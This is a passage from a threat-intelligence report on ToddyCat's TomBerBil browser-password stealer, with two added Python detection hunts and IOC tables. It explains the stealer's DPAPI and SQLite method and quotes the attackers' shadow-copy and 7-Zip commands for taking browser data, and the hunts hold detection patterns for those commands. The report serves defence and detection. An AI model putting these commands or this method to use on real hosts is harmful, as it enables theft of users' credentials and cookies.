  1240. <div id="attachment_112454" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112454" class="size-large wp-image-112454" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08-1024x398.png" alt="Archive file containing data stolen by WAExp" width="1024" height="398" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08-1024x398.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08-300x117.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08-768x299.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08-900x350.png 900w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08-740x288.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08-720x280.png 720w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08-800x311.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08.png 1046w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112454" class="wp-caption-text">Archive file containing data stolen by WAExp</p></div>
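Three of the tools described above leave file-system artefacts that survive the renaming: SoftEther loads hamcore.se2 by name, so it sits unchanged beside the renamed server binary; the OpenSSH keys in AppReadiness keep their key format under .ini/.dat names; and WAExp writes an extensionless Default-yyyyMMdd-hhmmss archive. The hunt below is an added example (not code from the report) that checks a directory tree, such as a mounted disk image, for all three; it assumes executables named vpn* beside hamcore.se2 are a stock SoftEther install, and the fixture tree is constructed.

```python
"""Hunt a file tree for the on-disk artefacts described in this report: a
SoftEther server binary renamed but still next to hamcore.se2, OpenSSH private
keys parked in C:\\Windows\\AppReadiness under .ini/.dat names, and WAExp
output archives named Default-yyyyMMdd-hhmmss in C:\\ProgramData\\Microsoft.

Added example, not code from the Securelist report. It takes a root directory,
so it can be pointed at a mounted disk image; the fixture tree is constructed.
Assumption: executables whose name starts with 'vpn' beside hamcore.se2 are
treated as a stock SoftEther install and not reported."""
import os
import re
import tempfile
from typing import Dict, List

WAEXP_ARCHIVE = re.compile(r"^Default-\d{8}-\d{6}$")
DISGUISE_EXTS = {".ini", ".dat"}
PEM_MARKER = b"PRIVATE KEY-----"  # present in both OpenSSH and PEM-format private keys


def looks_like_private_key(path: str) -> bool:
    with open(path, "rb") as fh:
        return PEM_MARKER in fh.read(128)


def _rel_win(dirpath: str, root: str) -> str:
    """Relative path in Windows form, lower-cased, for suffix checks."""
    return os.path.relpath(dirpath, root).replace(os.sep, "\\").lower()


def hunt(root: str) -> List[Dict[str, str]]:
    findings: List[Dict[str, str]] = []
    for dirpath, _dirs, files in os.walk(root):
        rel = _rel_win(dirpath, root)
        names = {f.lower() for f in files}
        # 1. SoftEther loads hamcore.se2 by name, so it survives the server being renamed.
        if "hamcore.se2" in names:
            for f in files:
                if f.lower().endswith(".exe") and not f.lower().startswith("vpn"):
                    findings.append({"rule": "softether_renamed_server", "path": os.path.join(dirpath, f)})
        # 2. Private keys hidden as .ini/.dat inside the ACL-locked AppReadiness folder.
        if rel.endswith("windows\\appreadiness"):
            for f in files:
                p = os.path.join(dirpath, f)
                if os.path.splitext(f)[1].lower() in DISGUISE_EXTS and looks_like_private_key(p):
                    findings.append({"rule": "appreadiness_key_file", "path": p})
        # 3. WAExp drops its archive, extensionless, as Default-<date>-<time>.
        if rel.endswith("programdata\\microsoft"):
            for f in files:
                if WAEXP_ARCHIVE.match(f):
                    findings.append({"rule": "waexp_archive", "path": os.path.join(dirpath, f)})
    return sorted(findings, key=lambda x: (x["rule"], x["path"]))


def build_fixture() -> str:
    """Constructed tree mixing the artefacts with benign look-alikes."""
    root = tempfile.mkdtemp(prefix="toddycat_hunt_")

    def put(rel: str, data: bytes = b"") -> None:
        p = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, "wb") as fh:
            fh.write(data)

    put("ProgramData/Lenovo/Lenovo/kln.exe", b"MZ")  # renamed vpnserver_x64.exe
    put("ProgramData/Lenovo/Lenovo/hamcore.se2", b"SE2")
    put("ProgramData/Lenovo/Lenovo/vpn_server.config")
    put("Program Files/SoftEther VPN Server/vpnserver_x64.exe", b"MZ")  # stock install: not reported
    put("Program Files/SoftEther VPN Server/vpncmd.exe", b"MZ")
    put("Program Files/SoftEther VPN Server/hamcore.se2", b"SE2")
    put("Windows/AppReadiness/value.dat", b"-----BEGIN OPENSSH PRIVATE KEY-----\n(constructed)\n")
    put("Windows/AppReadiness/read.ini", b"[settings]\nvalue=1\n")  # not a key: not reported
    put("ProgramData/Microsoft/Default-20240419-154001", b"PK\x03\x04")  # WAExp archive
    put("ProgramData/Microsoft/Default.log", b"ok")
    return root


def run_demo() -> List[str]:
    """Build the fixture and return 'rule:basename' for each finding."""
    return [f"{x['rule']}:{os.path.basename(x['path'])}" for x in hunt(build_fixture())]


if __name__ == "__main__":
    for line in run_demo():
        print(line)
```

On a live host the AppReadiness check needs SYSTEM rights once a.bat has run, since the script removes even Administrators from the folder's DACL; on a mounted image that restriction does not apply.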
  1241. <h3 id="tomberbil-for-stealing-passwords-from-browsers">TomBerBil for stealing passwords from browsers</h3>
  1242. <p>In addition to the data that attackers can collect from hosts, they are also interested in obtaining access to all online services that target users have access to. For an adversary with high privileges in the system, one fairly easy way to do this is to decrypt browser data containing cookies and passwords that the user may have saved to autofill authentication forms (<strong><a href="https://attack.mitre.org/techniques/T1555/003/" target="_blank" rel="noopener">T1555.003 Credentials from Password Stores: Credentials from Web Browsers</a></strong>).</p>
  1243. <p>There are many open-source tools available for decrypting storage data, one of these being <a href="https://github.com/gentilkiwi/mimikatz/wiki/module-~-dpapi" target="_blank" rel="noopener"><strong>mimikatz</strong></a>. The problem for the adversary is that these are well known to security systems and will immediately raise red flags if detected in the infrastructure.</p>
  1244. <p>To avoid detection, the attackers created a range of tools, implemented with different technologies but designed for the same purpose: extracting cookies and passwords from <strong>Chrome </strong>and <strong>Edge</strong>. Both browsers encrypt this data with the <a href="https://learn.microsoft.com/en-us/windows/win32/api/dpapi/nf-dpapi-cryptprotectdata" target="_blank" rel="noopener"><strong>CryptProtectData</strong></a> function of <strong>DPAPI </strong>(Data Protection Application Programming Interface). DPAPI encrypts data under a per-user master key that is itself protected with a key derived from the user&#8217;s logon password, so a blob protected in user scope can normally be decrypted only in that user&#8217;s security context.</p>
  1245. <p>All <strong>TomBerBil </strong>variants work according to the same principle. After starting, the malware begins to enumerate all processes running in the system and search for all instances of <strong>explorer.exe</strong>. It identifies the process users and compiles a list.</p>
  1246. <div id="attachment_112455" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160601/ToddyCat_data_collection_and_tunneling_09.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112455" class="size-large wp-image-112455" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160601/ToddyCat_data_collection_and_tunneling_09-1024x302.png" alt="Username identification function" width="1024" height="302" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160601/ToddyCat_data_collection_and_tunneling_09-1024x302.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160601/ToddyCat_data_collection_and_tunneling_09-300x88.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160601/ToddyCat_data_collection_and_tunneling_09-768x227.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160601/ToddyCat_data_collection_and_tunneling_09-740x218.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160601/ToddyCat_data_collection_and_tunneling_09-949x280.png 949w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160601/ToddyCat_data_collection_and_tunneling_09-800x236.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160601/ToddyCat_data_collection_and_tunneling_09.png 1095w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112455" class="wp-caption-text">Username identification function</p></div>
  1247. <p>The image above shows an example of the function that identifies users by process ID. It sends a <strong>WMI </strong>query to the <strong>Win32_Process </strong>class for the object whose <strong>ProcessId property </strong>equals the given PID, then calls its <strong>GetOwner </strong>method, which returns the user and domain name of the process owner.</p>
  1248. <p>After this, the malware looks for the browser&#8217;s encryption key, stored base64-encoded in the <strong>encrypted_key </strong>field of the following <strong>JSON </strong>files.</p><pre class="crayon-plain-tag">%LOCALAPPDATA%\Google\Chrome\User Data\Local State
  1249. %LOCALAPPDATA%\Microsoft\Edge\User Data\Local State</pre><p>
  1250. It then impersonates each user it identified and attempts to decrypt the browser&#8217;s master key with the <strong>CryptUnprotectData</strong> function. To do this, it calls the <strong>Unprotect</strong> method of the <strong>System.Security.Cryptography.ProtectedData</strong> class, which in turn calls <strong>CryptUnprotectData </strong>from Windows DPAPI.</p>
  1251. <div id="attachment_112456" style="width: 622px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160713/ToddyCat_data_collection_and_tunneling_10.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112456" class="size-full wp-image-112456" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160713/ToddyCat_data_collection_and_tunneling_10.png" alt="Calling the Unprotect function" width="612" height="76" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160713/ToddyCat_data_collection_and_tunneling_10.png 612w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160713/ToddyCat_data_collection_and_tunneling_10-300x37.png 300w" sizes="(max-width: 612px) 100vw, 612px" /></a><p id="caption-attachment-112456" class="wp-caption-text">Calling the Unprotect function</p></div>
  1252. <p>The image above shows an example of the <strong>Unprotect</strong> call, which receives the byte array obtained from the <strong>encrypted_key</strong> field. <strong>DataProtectionScope.CurrentUser</strong> is passed as the third parameter, meaning that DPAPI decrypts under the security context of the calling thread. That is precisely why the tool impersonates each user it found via explorer.exe before making the call: running as SYSTEM alone is not enough, because the blob is bound to that user&#8217;s DPAPI master key.</p>
  1253. <p>If the decryption is successful, the malware searches for <strong>Login Data</strong> and <strong>\Network\Cookies</strong> files inside the following folders (and, as the log below shows, their Edge equivalents).</p><pre class="crayon-plain-tag">%LOCALAPPDATA%\Google\Chrome\User Data\Default
  1254. %LOCALAPPDATA%\Google\Chrome\User Data\Profile *</pre><p>
  1255. It copies any files it finds to the temporary folder (the originals are locked while the browser is running), opens the copies as SQLite databases and runs the following queries.</p><pre class="crayon-plain-tag">SELECT origin_url, username_value, password_value FROM logins
  1256. SELECT cast(creation_utc as text) as creation_utc, host_key, name, path, cast(expires_utc as text) as
  1257. expires_utc, cast(last_access_utc as text) as last_access_utc, encrypted_value FROM cookies</pre><p>
  1258. Data retrieved this way is decrypted with the master key and written to the tool&#8217;s output files.</p>
  1259. <p>Most versions of the malware tool log their actions. Below is an example of a log file that they generate:</p><pre class="crayon-plain-tag">[+] Begin 7/28/2023 1:12:37 PM
  1260. [+] Current user SYSTEM
  1261. [*] [5516] [explorer] [UserName]
  1262. [+] Impersonate user UserName
  1263. [+] Current user UserName
  1264. [+] Local State File: C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Local State
  1265. [+] MasterKeyBytes: 6j&lt;...&gt;k=
  1266. [&gt;] Profile: C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default
  1267. [+] Copy C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default\Login Data to C:\Windows\TEMP\tmpF319.tmp
  1268. [+] Delete File C:\Windows\TEMP\tmpF319.tmp
  1269. [+] Copy C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies to C:\Windows\TEMP\tmpFA1F.tmp
  1270. [+] Delete File C:\Windows\TEMP\tmpFA1F.tmp
  1271. [+] Local State File: C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Local State
  1272. [+] MasterKeyBytes: fv&lt;...&gt;GM=
  1273. [&gt;] Profile: C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Default
  1274. [+] Copy C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Default\Login Data to C:\Windows\TEMP\tmpFCB0.tmp
  1275. [+] Delete File C:\Windows\TEMP\tmpFCB0.tmp
  1276. [+] Copy C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies to C:\Windows\TEMP\tmpFD5D.tmp
  1277. [+] Delete File C:\Windows\TEMP\tmpFD5D.tmp
  1278. [+] Recvtoself
  1279. [+] Current user SYSTEM
  1280. [+] End 7/28/2023 1:12:52 PM</pre><p>
  1281. One of the variants mimics <strong>Kaspersky Anti-Virus</strong>: the executable, written in .NET, is named <strong>avpui.exe</strong> (<strong><a href="https://attack.mitre.org/techniques/T1036/005/" target="_blank" rel="noopener">T1036.005 Masquerading: Match Legitimate Name or Location</a></strong>) and carries matching version metadata:</p>
  1282. <div id="attachment_112457" style="width: 777px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160939/ToddyCat_data_collection_and_tunneling_11.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112457" class="size-full wp-image-112457" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160939/ToddyCat_data_collection_and_tunneling_11.png" alt="Metadata of the tool pretending to be KAV" width="767" height="268" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160939/ToddyCat_data_collection_and_tunneling_11.png 767w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160939/ToddyCat_data_collection_and_tunneling_11-300x105.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160939/ToddyCat_data_collection_and_tunneling_11-740x259.png 740w" sizes="(max-width: 767px) 100vw, 767px" /></a><p id="caption-attachment-112457" class="wp-caption-text">Metadata of the tool pretending to be KAV</p></div>
  1283. <p>Some versions of the tool required specific command-line parameters to start. An example can be seen below:</p>
  1284. <div id="attachment_112458" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19161007/ToddyCat_data_collection_and_tunneling_12.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112458" class="size-large wp-image-112458" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19161007/ToddyCat_data_collection_and_tunneling_12-1024x187.png" alt="A TomBerBil variant started with a parameter" width="1024" height="187" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19161007/ToddyCat_data_collection_and_tunneling_12-1024x187.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19161007/ToddyCat_data_collection_and_tunneling_12-300x55.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19161007/ToddyCat_data_collection_and_tunneling_12-768x140.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19161007/ToddyCat_data_collection_and_tunneling_12-740x135.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19161007/ToddyCat_data_collection_and_tunneling_12-800x146.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19161007/ToddyCat_data_collection_and_tunneling_12.png 1076w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112458" class="wp-caption-text">A TomBerBil variant started with a parameter</p></div>
  1285. <p>In several cases, besides using TomBerBil, the adversary created a volume shadow copy of the disk and archived the browser <strong>User Data</strong> folder from it with <a href="https://www.7-zip.org/" target="_blank" rel="noopener">7-Zip</a> for later exfiltration. Reading from the shadow copy sidesteps the locks a running browser holds on the live database files.</p><pre class="crayon-plain-tag">wmic shadowcopy call create Volume='C:\'
  1286. "cmd" /c c:\Intel\7z6.exe a c:\Intel\1.7z -mx0 -r
  1287. \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Users\&lt;username&gt;\AppData\Local\Google\
  1288. Chrome\"User Data\"</pre><p>
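A small hunt over the behaviours this section describes, as an added example (editor's code, not from the report). The field names are Sysmon's (EventID 1 ProcessCreate: <code>Image</code>, <code>CommandLine</code>, <code>Hashes</code>) and Windows Security's (EventID 4663 object access: <code>ProcessName</code>, <code>ObjectName</code>, which only fires if a SACL has been set on the browser store files). The TomBerBil MD5s are the two from the IOC table; the "outside the vendor directory" heuristic for <code>avpui.exe</code> is an assumption, and every record in <code>SAMPLE_EVENTS</code> is constructed, not real telemetry.

```python
import re
from pathlib import PureWindowsPath

# TomBerBil MD5s, from the report's IOC table
TOMBERBIL_MD5 = {"750EF49AFB88DDD52F6B0C500BE9B717", "853A75364D76E9726474335BCD17E225"}
BROWSERS = {"chrome.exe", "msedge.exe"}
STORE_RE = re.compile(r"\\User Data\\(?:.*\\)?(?:Login Data|Cookies|Local State)$", re.I)
SHADOW_RE = re.compile(r"shadowcopy\s+call\s+create|vssadmin(?:\.exe)?\s+create\s+shadow", re.I)
ARCHIVE_RE = re.compile(r"HarddiskVolumeShadowCopy\d+.*User Data", re.I)


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def md5_from_hashes(hashes: str):
    """Sysmon's Hashes field reads 'SHA256=...,MD5=...,IMPHASH=...'; return the MD5 part."""
    for part in hashes.split(","):
        algo, _, value = part.partition("=")
        if algo.strip().upper() == "MD5":
            return value.strip().upper()
    return None


def evaluate(event: dict) -> list:
    """Return (rule, detail) pairs for one event."""
    hits = []
    if event["Source"] == "Sysmon" and event["EventID"] == 1:
        image, cmd = event.get("Image", ""), event.get("CommandLine", "")
        if SHADOW_RE.search(cmd):                       # wmic/vssadmin snapshot from a shell
            hits.append(("vss_snapshot_from_cli", cmd))
        if ARCHIVE_RE.search(cmd):                      # archiver reading User Data out of a snapshot
            hits.append(("browser_profile_archived_from_vss", cmd))
        if basename(image) == "avpui.exe":
            md5 = md5_from_hashes(event.get("Hashes", ""))
            if md5 in TOMBERBIL_MD5:
                hits.append(("known_tomberbil_hash", md5))
            elif "kaspersky" not in image.lower():      # assumption: real avpui.exe lives under the vendor dir
                hits.append(("avpui_outside_vendor_dir", image))
    elif event["Source"] == "Security" and event["EventID"] == 4663:
        proc, obj = event.get("ProcessName", ""), event.get("ObjectName", "")
        if STORE_RE.search(obj) and basename(proc) not in BROWSERS:
            hits.append(("nonbrowser_access_to_credential_store", f"{proc} -> {obj}"))
    return hits


def hunt(events) -> list:
    return [(e["EventID"], rule, detail) for e in events for rule, detail in evaluate(e)]


# Constructed records mirroring the activity described in the report; not real telemetry.
SAMPLE_EVENTS = [
    {"Source": "Sysmon", "EventID": 1, "Image": r"C:\Intel\avpui.exe", "CommandLine": r"C:\Intel\avpui.exe",
     "Hashes": "MD5=750EF49AFB88DDD52F6B0C500BE9B717"},
    {"Source": "Security", "EventID": 4663, "ProcessName": r"C:\Intel\avpui.exe",
     "ObjectName": r"C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"Source": "Security", "EventID": 4663, "ProcessName": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ObjectName": r"C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"Source": "Sysmon", "EventID": 1, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": r"wmic shadowcopy call create Volume='C:\'"},
    {"Source": "Sysmon", "EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'"cmd" /c c:\Intel\7z6.exe a c:\Intel\1.7z -mx0 -r '
                    r'\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Users\UserName\AppData\Local\Google\Chrome\"User Data\"'},
    {"Source": "Sysmon", "EventID": 1, "Image": r"C:\Program Files (x86)\Kaspersky Lab\avpui.exe",
     "CommandLine": "avpui.exe", "Hashes": "MD5=" + "00" * 16},             # placeholder hash
    {"Source": "Sysmon", "EventID": 1, "Image": r"C:\Users\Public\avpui.exe",
     "CommandLine": "avpui.exe", "Hashes": "MD5=" + "11" * 16},             # placeholder hash
]


def demo() -> list:
    return hunt(SAMPLE_EVENTS)


if __name__ == "__main__":
    for event_id, rule, detail in demo():
        print(f"[{event_id}] {rule}: {detail}")
```

Sysmon has no file-read event, so the copy-and-delete of <code>Login Data</code> into <code>C:\Windows\TEMP</code> is invisible to it beyond a short-lived <code>.tmp</code> file; the 4663 rule is what catches the read, and it costs one SACL on <code>Login Data</code>, <code>Cookies</code> and <code>Local State</code> per profile.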
  1289. <h2 id="conclusion">Conclusion</h2>
  1290. <p>We looked at several tools that allow the attackers to maintain access to target infrastructures and automatically search for and collect data of interest. The attackers are actively using techniques to bypass defenses in an attempt to mask their presence in the system.</p>
  1291. <p>To protect an organization&#8217;s infrastructure, we recommend adding the domains and IP addresses of cloud services that provide traffic tunneling to the firewall denylist. We also recommend restricting the set of tools administrators may use to access hosts remotely: tools that are not in use should be blocked outright, or closely monitored as a possible indicator of suspicious activity. In addition, users should be required not to store passwords in their browsers, since saved credentials give an attacker with local access a direct route to sensitive services. Reusing passwords across services compounds the risk, because one recovered password then unlocks further data.</p>
  1292. <h2 id="indicators-of-compromise">Indicators of compromise</h2>
  1293. <p><strong>Files</strong></p>
  1294. <table width="100%">
  1295. <tbody>
  1296. <tr>
  1297. <td width="60%"><a href="https://opentip.kaspersky.com/1D2B32910B500368EF0933CDC43FDE0B/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">1D2B32910B500368EF0933CDC43FDE0B</a></td>
  1298. <td width="40%">WAExp</td>
  1299. </tr>
  1300. <tr>
  1301. <td><a href="https://opentip.kaspersky.com/5C2870F18E64A14A64ABF9A56F5B6E6B/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">5C2870F18E64A14A64ABF9A56F5B6E6B</a></td>
  1302. <td>WAExp</td>
  1303. </tr>
  1304. <tr>
  1305. <td><a href="https://opentip.kaspersky.com/AFEA0827779025C92CAB86F685D6429A/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">AFEA0827779025C92CAB86F685D6429A</a></td>
  1306. <td>cuthead</td>
  1307. </tr>
  1308. <tr>
  1309. <td><a href="https://opentip.kaspersky.com/C7D8266C63F8AECA8D5F5BDCD433E72A/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">C7D8266C63F8AECA8D5F5BDCD433E72A</a></td>
  1310. <td>cuthead</td>
  1311. </tr>
  1312. <tr>
  1313. <td><a href="https://opentip.kaspersky.com/750EF49AFB88DDD52F6B0C500BE9B717/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">750EF49AFB88DDD52F6B0C500BE9B717</a></td>
  1314. <td>TomBerBil</td>
  1315. </tr>
  1316. <tr>
  1317. <td><a href="https://opentip.kaspersky.com/853A75364D76E9726474335BCD17E225/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">853A75364D76E9726474335BCD17E225</a></td>
  1318. <td>TomBerBil</td>
  1319. </tr>
  1320. <tr>
  1321. <td><a href="https://opentip.kaspersky.com/BA3EF3D0947031FB9FFBC2401BA82D79/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">BA3EF3D0947031FB9FFBC2401BA82D79</a></td>
  1322. <td>Krong</td>
  1323. </tr>
  1324. </tbody>
  1325. </table>
  1326. <p><strong>Legitimate tools</strong></p>
  1327. <table width="100%">
  1328. <tbody>
  1329. <tr>
  1330. <td width="60%"><a href="https://opentip.kaspersky.com/4A79A8B1F6978862ECFA71B55066AADD/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">4A79A8B1F6978862ECFA71B55066AADD</a></td>
  1331. <td width="40%">FRP client</td>
  1332. </tr>
  1333. <tr>
  1334. <td><a href="https://opentip.kaspersky.com/1F514121162865A9E664C919E71A6F62/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">1F514121162865A9E664C919E71A6F62</a></td>
  1335. <td>vpnserver_x64.exe</td>
  1336. </tr>
  1337. <tr>
  1338. <td><a href="https://opentip.kaspersky.com/6F32D6CFAAD3A956AACEA4C5A5C4FBFE/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">6F32D6CFAAD3A956AACEA4C5A5C4FBFE</a></td>
  1339. <td>vpnserver_x64.exe</td>
  1340. </tr>
  1341. <tr>
  1342. <td><a href="https://opentip.kaspersky.com/9DC7237AC63D552270C5CA27960168C3/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">9DC7237AC63D552270C5CA27960168C3</a></td>
  1343. <td>ngrok.exe</td>
  1344. </tr>
  1345. <tr>
  1346. <td><a href="https://opentip.kaspersky.com/34985FAE5FA8E9EBAA872DE8D0105005/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">34985FAE5FA8E9EBAA872DE8D0105005</a></td>
  1347. <td>ngrok.exe</td>
  1348. </tr>
  1349. </tbody>
  1350. </table>
  1351. <p><strong>C2 addresses</strong></p>
  1352. <table width="100%">
  1353. <tbody>
  1354. <tr>
  1355. <td width="40%"><a href="https://opentip.kaspersky.com/103.27.202.85/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">103.27.202[.]85</a></td>
  1356. <td width="60%">&#8211; SSH server</td>
  1357. </tr>
  1358. <tr>
  1359. <td><a href="https://opentip.kaspersky.com/118.193.40.42/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">118.193.40[.]42</a></td>
  1360. <td>&#8211; Server from SoftEther VPN</td>
  1361. </tr>
  1362. <tr>
  1363. <td><a href="https://opentip.kaspersky.com/Ha.bbmouseme.com/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">Ha[.]bbmouseme[.]com</a></td>
  1364. <td>&#8211; Server from SoftEther VPN</td>
  1365. </tr>
  1366. </tbody>
  1367. </table>
  1368. <p><strong>Links</strong></p>
  1369. <table width="100%">
  1370. <tbody>
  1371. <tr>
  1372. <td width="75%"><a href="https://opentip.kaspersky.com/http%3A%2F%2Fwww.netportal.or.kr%2Fcommon%2Fcss%2Fmain.js/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxp://www.netportal.or[.]kr/common/css/main.js</a></td>
  1373. <td width="25%">vpnserver_x64.exe</td>
  1374. </tr>
  1375. <tr>
  1376. <td><a href="https://opentip.kaspersky.com/http%3A%2F%2Fwww.netportal.or.kr%2Fcommon%2Fcss%2Fham.js/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxp://www.netportal.or[.]kr/common/css/ham.js</a></td>
  1377. <td>Hamcore.se2</td>
  1378. </tr>
  1379. <tr>
  1380. <td><a href="https://opentip.kaspersky.com/http%3A%2F%2F23.106.122.5%2Fhamcore.se2/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxp://23.106.122[.]5/hamcore.se2</a></td>
  1381. <td>Hamcore.se2</td>
  1382. </tr>
  1383. <tr>
  1384. <td><a href="https://opentip.kaspersky.com/https%3A%2F%2Fetracking.nso.go.th%2FUserFiles%2FFile%2F111%2Ftasklist.exe/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://etracking.nso.go[.]th/UserFiles/File/111/tasklist.exe</a></td>
  1385. <td>vpnserver_x64.exe</td>
  1386. </tr>
  1387. <tr>
  1388. <td><a href="https://opentip.kaspersky.com/https%3A%2F%2Fetracking.nso.go.th%2FUserFiles%2FFile%2F111%2Fhamcore.se2/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://etracking.nso.go[.]th/UserFiles/File/111/hamcore.se2</a></td>
  1389. <td>Hamcore.se2</td>
  1390. </tr>
  1391. </tbody>
  1392. </table>
  1393. ]]></content:encoded>
  1394. <wfw:commentRss>https://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/feed/</wfw:commentRss>
  1395. <slash:comments>2</slash:comments>
  1396. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/22071148/sl_toddy_cat_palm_civet_in_a_digital_tube_photoreal.jpg" width="1376" height="864"><media:keywords>full</media:keywords></media:content>
  1397. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/22071148/sl_toddy_cat_palm_civet_in_a_digital_tube_photoreal-1024x643.jpg" width="1024" height="643"><media:keywords>large</media:keywords></media:content>
